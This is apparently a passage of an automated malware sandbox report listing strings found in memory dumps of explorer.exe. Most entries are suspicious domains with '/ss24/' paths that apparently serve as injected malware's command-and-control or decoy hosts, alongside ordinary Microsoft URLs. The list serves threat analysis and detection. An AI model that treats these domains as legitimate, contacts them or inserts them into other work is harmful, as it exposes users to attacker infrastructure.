Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.2025tengxun171.lat/ss24/
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.2025tengxun171.lat/ss24/www.8208975.com
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.2025tengxun171.latReferer:
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.65597.photos
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.65597.photos/ss24/
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.65597.photos/ss24/www.realearthpower.com
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.65597.photosReferer:
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.8208975.com
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.8208975.com/ss24/
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.8208975.com/ss24/www.65597.photos
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.8208975.comReferer:
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.8548d.com
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.8548d.com/ss24/
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.8548d.com/ss24/www.kucinglucu.online
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.8548d.comReferer:
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.awvd97.com
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.awvd97.com/ss24/
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.awvd97.com/ss24/www.supporthq.life
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.awvd97.comReferer:
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crucka.xyz
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crucka.xyz/ss24/
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crucka.xyz/ss24/www.awvd97.com
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.crucka.xyzReferer:
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.head2toe.boutique
Source: explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.head2toe.boutique/ss24/
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.head2toe.boutiqueReferer:
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kucinglucu.online
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kucinglucu.online/ss24/
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kucinglucu.online/ss24/www.thehalcyon.studio
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kucinglucu.onlineReferer:
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mewtcp.xyz
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mewtcp.xyz/ss24/
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mewtcp.xyz/ss24/www.qdfake609am.xyz
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mewtcp.xyzReferer:
Source: explorer.exe, 00000008.00000002.3845642332.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082201534.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.0000000009237000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qdfake609am.xyz
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qdfake609am.xyz/ss24/
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qdfake609am.xyz/ss24/www.startable.online
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qdfake609am.xyzReferer:
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.realearthpower.com
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.realearthpower.com/ss24/
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.realearthpower.com/ss24/www.crucka.xyz
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.realearthpower.comReferer:
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.startable.online
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.startable.online/ss24/
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.startable.online/ss24/www.ygyqpswy.xyz
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.startable.onlineReferer:
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.supporthq.life
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.supporthq.life/ss24/
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.supporthq.life/ss24/www.head2toe.boutique
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.supporthq.lifeReferer:
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thehalcyon.studio
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thehalcyon.studio/ss24/
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thehalcyon.studio/ss24/www.2025tengxun171.lat
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thehalcyon.studioReferer:
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ygyqpswy.xyz
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ygyqpswy.xyz/ss24/
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ygyqpswy.xyz/ss24/www.163875.shop
Source: explorer.exe, 00000008.00000003.2285187959.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082057115.000000000C100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3082166553.000000000C164000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3849969371.000000000C16B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ygyqpswy.xyzReferer:
Source: explorer.exe, 00000008.00000000.1442441484.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2285468060.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3848687718.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000008.00000000.1442441484.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2285468060.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3848687718.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000008.00000000.1442441484.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2285468060.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3848687718.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSA4
Source: explorer.exe, 00000008.00000000.1442441484.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2285468060.000000000BCB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3848687718.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSd
Source: explorer.exe, 00000008.00000002.3843585316.000000000704E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2285356708.000000000704B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000008.00000002.3845273913.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1434261414.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000008.00000003.2290686270.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1429025794.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3842954114.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3081373423.0000000006F33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
